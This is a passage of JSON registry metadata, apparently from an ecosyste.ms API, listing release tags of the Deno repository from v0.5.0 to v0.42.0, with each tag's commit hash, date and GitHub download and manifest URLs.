std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","